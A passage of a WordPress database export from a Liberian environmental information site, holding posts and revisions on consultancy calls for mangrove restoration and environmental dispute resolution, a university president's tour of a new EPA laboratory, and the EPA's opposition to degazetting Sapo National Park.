target=\"_blank\" rel=\"noopener\">Download</a>','CALL FOR EXPRESSION OF INTEREST: National Conservation Oraganization / CSO  for Mangroves Restoration-ToR','','publish','closed','closed','','call-for-expression-of-interest-national-conservation-oraganization-cso-for-mangroves-restoration-tor','','','2025-08-04 16:56:28','2025-08-04 16:56:28','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5553',43,'ekms_bulletin','',0),(5554,38,'2025-08-04 16:53:25','2025-08-04 16:53:25','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1:</strong> Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2:</strong> Supporting Innovative Technologies for Climate Information and Communication\r\nManagement\r\n\r\n<strong>Component 3:</strong> Introducing Engineered Hybrid Adaptation Solutions\r\n\r\n<strong>Component 4:</strong> Supporting Resilient Livelihood Diversification through Training and Improved\r\nAccess to Finance.\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems. In addition, the vulnerability of Liberia’s coastal communities and their resilience to climate change, particularly in Sinoe County, is exacerbated by the limited capacity of GoL to provide essential services and adequate support for, among other things, water and sanitation, healthcare, utility-scale energy, and road infrastructure.\r\n\r\nAs a result, coastal communities in Liberia are threatened by damaging floods and erosion, both of which are increasing due to sea level rise and other impacts of climate change, such as increasingly intense rainfall events and the current limited financial and technical capacity at the national and county levels to address these threats.\r\n\r\nClick To:','CALL FOR EXPRESSION OF INTEREST: National Conservation Oraganization / CSO  for Mangroves Restoration-ToR','','inherit','closed','closed','','5553-revision-v1','','','2025-08-04 16:53:25','2025-08-04 16:53:25','',5553,'https://ekmsliberia.info/?p=5554',0,'revision','',0),(5555,38,'2025-08-04 16:54:18','2025-08-04 16:54:18','','Nationanal Conservation Oraganization for Mangroves Restoration-ToR','','inherit','open','closed','','nationanal-conservation-oraganization-for-mangroves-restoration-tor','','','2025-08-04 16:54:18','2025-08-04 16:54:18','',0,'https://ekmsliberia.info/wp-content/uploads/2025/08/Nationanal-Conservation-Oraganization-for-Mangroves-Restoration-ToR.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5556,38,'2025-08-04 16:56:28','2025-08-04 16:56:28','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1:</strong> Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2:</strong> Supporting Innovative Technologies for Climate Information and Communication\r\nManagement\r\n\r\n<strong>Component 3:</strong> Introducing Engineered Hybrid Adaptation Solutions\r\n\r\n<strong>Component 4:</strong> Supporting Resilient Livelihood Diversification through Training and Improved\r\nAccess to Finance.\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems. In addition, the vulnerability of Liberia’s coastal communities and their resilience to climate change, particularly in Sinoe County, is exacerbated by the limited capacity of GoL to provide essential services and adequate support for, among other things, water and sanitation, healthcare, utility-scale energy, and road infrastructure.\r\n\r\nAs a result, coastal communities in Liberia are threatened by damaging floods and erosion, both of which are increasing due to sea level rise and other impacts of climate change, such as increasingly intense rainfall events and the current limited financial and technical capacity at the national and county levels to address these threats.\r\n\r\nClick To: <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/08/Nationanal-Conservation-Oraganization-for-Mangroves-Restoration-ToR.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','CALL FOR EXPRESSION OF INTEREST: National Conservation Oraganization / CSO  for Mangroves Restoration-ToR','','inherit','closed','closed','','5553-revision-v1','','','2025-08-04 16:56:28','2025-08-04 16:56:28','',5553,'https://ekmsliberia.info/?p=5556',0,'revision','',0),(5557,38,'2025-08-05 20:11:00','2025-08-05 20:11:00','<strong>BACKGROUND</strong>\r\n\r\nThe Environmental Protection Agency (EPA) seeks to establish an effective, accessible, and sustainable alternative dispute resolution (ADR) system to address environmental conflicts.\r\n\r\nEnvironmental disputes in Liberia are increasingly common, arising from issues such as land use conflicts, resource management, pollution, community rights, and adherence to environmental regulations. Many of these conflicts are deeply rooted in longstanding socio-economic injustices, unclear or overlapping land and resource rights, and limited access to formal judicial processes, especially for marginalized communities.\r\n\r\nWhile Liberia has some experience with ADR in sectors like land governance and community rights, there remains a significant gap in applying such mechanisms specifically to environmental conflicts. The development of an environmental ADR system is a strategic step towards integrating conflict management and environmental governance, fostering dialogue among stakeholders, and strengthening environmental justice.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nTraditionally, such disputes have been addressed through litigation or administrative complaints, which are often time-consuming, costly, and inaccessible for many stakeholders. The judicial system in Liberia, like in many other developing countries, faces significant backlog and resource constraints, making it difficult to deliver timely justice. Moreover, formal court proceedings may lack the technical expertise necessary to effectively adjudicate complex environmental issues, potentially leading to decisions that do not adequately reflect environmental realities or stakeholder interests.\r\n\r\nRecognizing these challenges, the Liberian government and the EPA have increasingly emphasized the need for alternative conflict resolution mechanisms. These approaches aim to provide accessible, culturally appropriate, and efficient avenues for resolving disputes before they escalate into conflicts or litigation\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nTo design a comprehensive, sector-specific ADR framework tailored to Liberia’s environmental disputes, ensuring fairness, efficiency, transparency, and stakeholder inclusiveness, with validated operational procedures and institutional arrangements.\r\n\r\nClick To: <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/08/ToR-to-develop-ADR-EPA.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','CALL FOR EXPRESSION OF INTEREST TO PROVIDE CONSULTANCY SERVICE: To develop an Environmental Dispute Resolution (ADR) Mechanism for the Liberia EPA','','publish','closed','closed','','call-for-expression-of-interest-to-provide-consultancy-service-to-develop-an-environmental-dispute-resolution-adr-mechanism-for-the-liberia-epa','','','2025-08-05 20:11:00','2025-08-05 20:11:00','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5557',42,'ekms_bulletin','',0),(5558,38,'2025-08-05 20:09:22','2025-08-05 20:09:22','<strong>BACKGROUND</strong>\r\n\r\nThe Environmental Protection Agency (EPA) seeks to establish an effective, accessible, and sustainable alternative dispute resolution (ADR) system to address environmental conflicts.\r\n\r\nEnvironmental disputes in Liberia are increasingly common, arising from issues such as land use conflicts, resource management, pollution, community rights, and adherence to environmental regulations. Many of these conflicts are deeply rooted in longstanding socio-economic injustices, unclear or overlapping land and resource rights, and limited access to formal judicial processes, especially for marginalized communities.\r\n\r\nWhile Liberia has some experience with ADR in sectors like land governance and community rights, there remains a significant gap in applying such mechanisms specifically to environmental conflicts. The development of an environmental ADR system is a strategic step towards integrating conflict management and environmental governance, fostering dialogue among stakeholders, and strengthening environmental justice.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nTraditionally, such disputes have been addressed through litigation or administrative complaints, which are often time-consuming, costly, and inaccessible for many stakeholders. The judicial system in Liberia, like in many other developing countries, faces significant backlog and resource constraints, making it difficult to deliver timely justice. Moreover, formal court proceedings may lack the technical expertise necessary to effectively adjudicate complex environmental issues, potentially leading to decisions that do not adequately reflect environmental realities or stakeholder interests.\r\n\r\nRecognizing these challenges, the Liberian government and the EPA have increasingly emphasized the need for alternative conflict resolution mechanisms. These approaches aim to provide accessible, culturally appropriate, and efficient avenues for resolving disputes before they escalate into conflicts or litigation\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nTo design a comprehensive, sector-specific ADR framework tailored to Liberia’s environmental disputes, ensuring fairness, efficiency, transparency, and stakeholder inclusiveness, with validated operational procedures and institutional arrangements.\r\n\r\nClick To:','CALL FOR EXPRESSION OF INTEREST TO PROVIDE CONSULTANCY SERVICE: To develop an Environmental Dispute Resolution (ADR) Mechanism for the Liberia EPA','','inherit','closed','closed','','5557-revision-v1','','','2025-08-05 20:09:22','2025-08-05 20:09:22','',5557,'https://ekmsliberia.info/?p=5558',0,'revision','',0),(5559,38,'2025-08-05 20:09:56','2025-08-05 20:09:56','','ToR to develop ADR-EPA','','inherit','open','closed','','tor-to-develop-adr-epa','','','2025-08-05 20:09:56','2025-08-05 20:09:56','',0,'https://ekmsliberia.info/wp-content/uploads/2025/08/ToR-to-develop-ADR-EPA.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5560,38,'2025-08-05 20:11:00','2025-08-05 20:11:00','<strong>BACKGROUND</strong>\r\n\r\nThe Environmental Protection Agency (EPA) seeks to establish an effective, accessible, and sustainable alternative dispute resolution (ADR) system to address environmental conflicts.\r\n\r\nEnvironmental disputes in Liberia are increasingly common, arising from issues such as land use conflicts, resource management, pollution, community rights, and adherence to environmental regulations. Many of these conflicts are deeply rooted in longstanding socio-economic injustices, unclear or overlapping land and resource rights, and limited access to formal judicial processes, especially for marginalized communities.\r\n\r\nWhile Liberia has some experience with ADR in sectors like land governance and community rights, there remains a significant gap in applying such mechanisms specifically to environmental conflicts. The development of an environmental ADR system is a strategic step towards integrating conflict management and environmental governance, fostering dialogue among stakeholders, and strengthening environmental justice.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nTraditionally, such disputes have been addressed through litigation or administrative complaints, which are often time-consuming, costly, and inaccessible for many stakeholders. The judicial system in Liberia, like in many other developing countries, faces significant backlog and resource constraints, making it difficult to deliver timely justice. Moreover, formal court proceedings may lack the technical expertise necessary to effectively adjudicate complex environmental issues, potentially leading to decisions that do not adequately reflect environmental realities or stakeholder interests.\r\n\r\nRecognizing these challenges, the Liberian government and the EPA have increasingly emphasized the need for alternative conflict resolution mechanisms. These approaches aim to provide accessible, culturally appropriate, and efficient avenues for resolving disputes before they escalate into conflicts or litigation\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nTo design a comprehensive, sector-specific ADR framework tailored to Liberia’s environmental disputes, ensuring fairness, efficiency, transparency, and stakeholder inclusiveness, with validated operational procedures and institutional arrangements.\r\n\r\nClick To: <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/08/ToR-to-develop-ADR-EPA.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','CALL FOR EXPRESSION OF INTEREST TO PROVIDE CONSULTANCY SERVICE: To develop an Environmental Dispute Resolution (ADR) Mechanism for the Liberia EPA','','inherit','closed','closed','','5557-revision-v1','','','2025-08-05 20:11:00','2025-08-05 20:11:00','',5557,'https://ekmsliberia.info/?p=5560',0,'revision','',0),(5561,38,'2025-08-06 21:51:10','2025-08-06 21:51:10','<!-- wp:paragraph -->\n<p>Monrovia, Liberia – August 6, 2025 –In a move to strengthen collaboration between academic and environmental institutions, the President of the University of Liberia (UL), Dr. Layli Maparyan, on Tuesday visited the Environmental Protection Agency (EPA) of Liberia’s headquarters in Mamba Point, Monrovia. Her visit included a tour of the EPA’s newly dedicated, state-of-the-art environmental laboratory, a milestone investment in science, research, and national development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The modern facility, which was officially dedicated on July 23, 2025 by Liberia\'s Vice President Hon. Jeremiah Kpan Koung, has already been hailed as one of the most advanced public environmental laboratories in Liberia. The construction of the lab is part of EPA’s broader efforts to enhance scientific capacity in addressing pollution, climate change, marine conservation, and environmental compliance and cost hundred thousand united state dollars.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5562,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2025/08/WhatsApp-Image-2025-08-06-at-11.33.33-1024x768.jpeg\" alt=\"\" class=\"wp-image-5562\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Welcoming Dr. Maparyan, EPA Executive Director Dr. Emmanuel K. Urey Yarkpawolo praised the growing collaboration between the EPA and the University of Liberia and used the occasion to call attention to Liberia’s lack of capacity in the field of marine science.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia is a marine country. Our ocean territory is vast and full of potential, yet we are critically undercapacitated in marine science,” Dr. Yarkpawolo said. “To find students pursuing this field in Liberia is difficult, and that’s something we must change.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed that the lab was not built only for the EPA but as a national resource for institutions, researchers, and students to explore and innovate. The facility will provide services such as air and water quality testing, soil analysis, hazardous material detection, and future marine ecosystem research.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo also revealed that the EPA is working closely with the International Atomic Energy Agency (IAEA) laboratory in Monaco, which has committed to supporting the lab through the donation of equipment and advanced training.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This partnership with the IAEA will help us build a true center of excellence right here in Liberia. Our students, researchers, and environmental professionals deserve access to world-class resources,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also, the Environmental Protection Agency of Liberia with support from its partner NOVASPHERE, an NGO supported by the Canadian government’s Climate Support Program, already have a functional Climate Change Laboratory at the University of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Layli Maparyan, after touring the lab, expressed her admiration for the progress made at the EPA and emphasized the need to expose Liberian students to real career pathways early in their academic journey.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are about to welcome a new class of freshmen at the University of Liberia. And it’s not just about coming to school, it’s about understanding the trajectory of a career,” she said. “I want students to walk in with purpose, and part of that requires exposure to institutions like the EPA.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Maparyan said that the university is working to build the capacity of some faculty members abroad for training in environmental and marine science so they can return and help strengthen the academic programs in these areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This facility can be a spark,” she noted. “I see opportunities for our students to intern, for our professors to collaborate, and for our research to go beyond the classroom.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The new EPA laboratory is now among the best-equipped in the country and is capable of handling complex environmental testing in water quality, soil contamination, air pollutants, and potentially marine biodiversity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Both the EPA and UL leadership committed to developing a Memorandum of Understanding (MoU) to establish a formal partnership. This would cover student internships, joint research, curriculum enhancement, and faculty training exchanges.</p>\n<!-- /wp:paragraph -->','UL President Tours EPA’s New State-of-the-Art Laboratory; Dr. Urey Yarkpawolo Stresses Need for Marine Science Advancement','','publish','open','open','','ul-president-tours-epas-new-state-of-the-art-laboratory-dr-urey-yarkpawolo-stresses-need-for-marine-science-advancement','','','2025-08-06 21:51:14','2025-08-06 21:51:14','',0,'https://ekmsliberia.info/?p=5561',47,'post','',0),(5562,38,'2025-08-06 21:50:02','2025-08-06 21:50:02','','WhatsApp-Image-2025-08-06-at-11.33.33','','inherit','open','closed','','whatsapp-image-2025-08-06-at-11-33-33','','','2025-08-06 21:50:02','2025-08-06 21:50:02','',5561,'https://ekmsliberia.info/wp-content/uploads/2025/08/WhatsApp-Image-2025-08-06-at-11.33.33.jpeg',0,'attachment','image/jpeg',0),(5563,38,'2025-08-06 21:50:45','2025-08-06 21:50:45','','WhatsApp Image 2025-08-06 at 11.33.35','','inherit','open','closed','','whatsapp-image-2025-08-06-at-11-33-35','','','2025-08-06 21:50:45','2025-08-06 21:50:45','',5561,'https://ekmsliberia.info/wp-content/uploads/2025/08/WhatsApp-Image-2025-08-06-at-11.33.35.jpeg',0,'attachment','image/jpeg',0),(5564,38,'2025-08-06 21:51:10','2025-08-06 21:51:10','<!-- wp:paragraph -->\n<p>Monrovia, Liberia – August 6, 2025 –In a move to strengthen collaboration between academic and environmental institutions, the President of the University of Liberia (UL), Dr. Layli Maparyan, on Tuesday visited the Environmental Protection Agency (EPA) of Liberia’s headquarters in Mamba Point, Monrovia. Her visit included a tour of the EPA’s newly dedicated, state-of-the-art environmental laboratory, a milestone investment in science, research, and national development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The modern facility, which was officially dedicated on July 23, 2025 by Liberia\'s Vice President Hon. Jeremiah Kpan Koung, has already been hailed as one of the most advanced public environmental laboratories in Liberia. The construction of the lab is part of EPA’s broader efforts to enhance scientific capacity in addressing pollution, climate change, marine conservation, and environmental compliance and cost hundred thousand united state dollars.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5562,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2025/08/WhatsApp-Image-2025-08-06-at-11.33.33-1024x768.jpeg\" alt=\"\" class=\"wp-image-5562\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Welcoming Dr. Maparyan, EPA Executive Director Dr. Emmanuel K. Urey Yarkpawolo praised the growing collaboration between the EPA and the University of Liberia and used the occasion to call attention to Liberia’s lack of capacity in the field of marine science.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia is a marine country. Our ocean territory is vast and full of potential, yet we are critically undercapacitated in marine science,” Dr. Yarkpawolo said. “To find students pursuing this field in Liberia is difficult, and that’s something we must change.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed that the lab was not built only for the EPA but as a national resource for institutions, researchers, and students to explore and innovate. The facility will provide services such as air and water quality testing, soil analysis, hazardous material detection, and future marine ecosystem research.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo also revealed that the EPA is working closely with the International Atomic Energy Agency (IAEA) laboratory in Monaco, which has committed to supporting the lab through the donation of equipment and advanced training.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This partnership with the IAEA will help us build a true center of excellence right here in Liberia. Our students, researchers, and environmental professionals deserve access to world-class resources,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also, the Environmental Protection Agency of Liberia with support from its partner NOVASPHERE, an NGO supported by the Canadian government’s Climate Support Program, already have a functional Climate Change Laboratory at the University of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Layli Maparyan, after touring the lab, expressed her admiration for the progress made at the EPA and emphasized the need to expose Liberian students to real career pathways early in their academic journey.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are about to welcome a new class of freshmen at the University of Liberia. And it’s not just about coming to school, it’s about understanding the trajectory of a career,” she said. “I want students to walk in with purpose, and part of that requires exposure to institutions like the EPA.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Maparyan said that the university is working to build the capacity of some faculty members abroad for training in environmental and marine science so they can return and help strengthen the academic programs in these areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This facility can be a spark,” she noted. “I see opportunities for our students to intern, for our professors to collaborate, and for our research to go beyond the classroom.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The new EPA laboratory is now among the best-equipped in the country and is capable of handling complex environmental testing in water quality, soil contamination, air pollutants, and potentially marine biodiversity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Both the EPA and UL leadership committed to developing a Memorandum of Understanding (MoU) to establish a formal partnership. This would cover student internships, joint research, curriculum enhancement, and faculty training exchanges.</p>\n<!-- /wp:paragraph -->','UL President Tours EPA’s New State-of-the-Art Laboratory; Dr. Urey Yarkpawolo Stresses Need for Marine Science Advancement','','inherit','closed','closed','','5561-revision-v1','','','2025-08-06 21:51:10','2025-08-06 21:51:10','',5561,'https://ekmsliberia.info/?p=5564',0,'revision','',0),(5567,38,'2025-08-11 07:58:20','2025-08-11 07:58:20','<!-- wp:paragraph -->\n<p>Monrovia, August 11, 2025 – The Executive Director of Liberia’s Environmental Protection Agency (EPA), Dr. Emmanuel K. Urey Yarkpawolo, has strongly opposed a proposal by Hon. Thomas Romeo Quiah, Representative for Sinoe County District #2, to de-gazette Sapo National Park (SNP), warning that such a move would cause “irreversible damage” to Liberia’s environmental, economic, and cultural heritage.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a detailed rebuttal issued Monday, Dr. Yarkpawolo described the SNP as the nation’s “prime treasure” and the largest protected area in Liberia — home to one of the most intact tropical rainforests on Earth. The park shelters hundreds of species of mammals, birds, butterflies, and plants—many of them rare, endemic, or endangered—and plays a crucial role in maintaining ecological stability and climate resilience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Critical Ecosystem and Climate Value </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the EPA, the park forms the heart of the largest remaining portion of the Upper Guinean Forest of West Africa, acting as a global carbon sink with the capacity to store up to 29 million tons of carbon. “Degazetting would destroy Liberia’s competitive advantage in global carbon markets,” Dr. Yarkpawolo warned, noting that intact forests are central to ongoing discussions for the nation’s carbon trading policy and its commitments under the Paris Agreement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed that studies show every dollar invested in a protected area yields at least six dollars in economic returns through ecosystem services such as water purification, flood regulation, and hazard protection. The park’s ecological benefits also help reduce drought and extreme heat risks for local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Violation of Laws and International Commitments </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA chief cautioned that the proposal directly conflicts with Liberia’s Environmental Protection and Management Law (2003), the National Wildlife Conservation and Protected Area Management Law (2016), and the Forest Reform Law (2006). It would also undermine the country’s pledge to protect 30% of its forests and its obligations under global biodiversity and climate treaties.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Economic Risks and Community Impact </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo rejected the notion that degazettement would benefit surrounding communities, citing past experiences with unregulated logging that left forests depleted and local people worse off. He emphasized that over 90% of park staff are hired from nearby towns, providing steady local employment—an opportunity that would be lost if protections were removed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Experience shows degazettement favors elite commercial interests over grassroots development,” he said. “It would open the door to unsustainable exploitation, rural poverty, and the erosion of community rights.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>A Call for Strengthened Management, Not Elimination </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Instead of removing the park’s protected status, the EPA is recommending governance reforms, increased funding, and expanded community participation. Specific proposals include: boosting SNP’s operational budget, launching international fundraising campaigns, conducting carbon credit feasibility studies, and resolving outstanding boundary disputes with affected communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The long-term socio-ecological and economic costs of degazetting far outweigh any short-term gains,” Dr. Yarkpawolo concluded. “Our task is not to dismantle Sapo National Park, but to unlock its full potential for conservation and sustainable livelihoods.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sapo National Park, located in Sinoe County, spans 180,400 hectares and remains one of Liberia’s most important symbols of biodiversity, ecological resilience, and national pride.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Signed:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Danise Love Dennis-Dodoo</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Director for Media and Communications</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Environmental Protection Agency</p>\n<!-- /wp:paragraph -->','EPA Boss Rejects Proposal to Remove Sapo National Park from Protected Status','','publish','open','open','','epa-boss-rejects-proposal-to-remove-sapo-national-park-from-protected-status','','','2025-08-13 14:08:17','2025-08-13 14:08:17','',0,'https://ekmsliberia.info/?p=5567',46,'post','',0),(5568,38,'2025-08-11 07:58:20','2025-08-11 07:58:20','<!-- wp:paragraph -->\n<p>Monrovia, August 11, 2025 – The Executive Director of Liberia’s Environmental Protection Agency (EPA), Dr. Emmanuel K. Urey Yarkpawolo, has strongly opposed a proposal by Hon. Thomas Romeo Quiah, Representative for Sinoe County District #2, to de-gazette Sapo National Park (SNP), warning that such a move would cause “irreversible damage” to Liberia’s environmental, economic, and cultural heritage.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a detailed rebuttal issued Monday, Dr. Yarkpawolo described the SNP as the nation’s “prime treasure” and the largest protected area in Liberia — home to one of the most intact tropical rainforests on Earth. The park shelters hundreds of species of mammals, birds, butterflies, and plants—many of them rare, endemic, or endangered—and plays a crucial role in maintaining ecological stability and climate resilience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Critical Ecosystem and Climate Value </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the EPA, the park forms the heart of the largest remaining portion of the Upper Guinean Forest of West Africa, acting as a global carbon sink with the capacity to store up to 29 million tons of carbon. “Degazetting would destroy Liberia’s competitive advantage in global carbon markets,” Dr. Yarkpawolo warned, noting that intact forests are central to ongoing discussions for the nation’s carbon trading policy and its commitments under the Paris Agreement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed that studies show every dollar invested in a protected area yields at least six dollars in economic returns through ecosystem services such as water purification, flood regulation, and hazard protection. The park’s ecological benefits also help reduce drought and extreme heat risks for local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Violation of Laws and International Commitments </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA chief cautioned that the proposal directly conflicts with Liberia’s Environmental Protection and Management Law (2003), the National Wildlife Conservation and Protected Area Management Law (2016), and the Forest Reform Law (2006). It would also undermine the country’s pledge to protect 30% of its forests and its obligations under global biodiversity and climate treaties.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Economic Risks and Community Impact </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo rejected the notion that degazettement would benefit surrounding communities, citing past experiences with unregulated logging that left forests depleted and local people worse off. He emphasized that over 90% of park staff are hired from nearby towns, providing steady local employment—an opportunity that would be lost if protections were removed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Experience shows degazettement favors elite commercial interests over grassroots development,” he said. “It would open the door to unsustainable exploitation, rural poverty, and the erosion of community rights.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>A Call for 